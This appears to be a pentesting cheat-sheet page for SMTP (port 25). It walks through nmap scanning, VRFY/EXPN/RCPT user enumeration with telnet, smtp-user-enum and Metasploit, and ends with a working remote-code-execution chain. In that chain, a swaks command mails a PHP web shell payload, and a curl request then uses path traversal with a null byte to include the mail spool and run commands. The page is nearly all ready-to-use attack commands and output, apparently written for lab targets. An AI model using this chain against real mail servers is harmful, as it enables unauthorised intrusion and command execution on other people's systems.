Skip to content

25 - Pentesting smtp

nmap

nmap -p 25 -sV -sC -Pn $IP
25/tcp    open  smtp    Postfix smtpd

Enumeration

telnet

> telnet $IP 25

> VRFY root
< 252 2.0.0 root

> VRFY szalek
< 550 5.1.1 <szalek>: Recipient address rejected: User unknown in local recipient table

> VRFY admin
< 550 5.1.1 <admin>: Recipient address rejected: User unknown in local recipient table

> VRFY user
< 252 2.0.0 user
smtp-user-enum
sudo apt install smtp-user-enum
smtp-user-enum -M VRFY -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M RCPT -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
smtp-user-enum -M EXPN -U /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt -t $IP
metasploit
use auxiliary/scanner/smtp/smtp_enum
msf auxiliary(smtp_enum) > set rhosts 10.10.200.211
msf auxiliary(smtp_enum) > set rport 25
msf auxiliary(smtp_enum) > set USER_FILE /tmp/users.txt
msf auxiliary(smtp_enum) > run

Executing command

Send email

swaks --to asterisk@localhost --from admin@vtiger.htb --header "EmailHacked" --body 'BodyStart <?php system($_REQUEST["cmd"]); ?> BodyEnd' --server $(target)
Execute
curl -k 'https://10.129.84.70/file.php?file=../../../../../../../..//var/mail/UserName%00&cmd=id'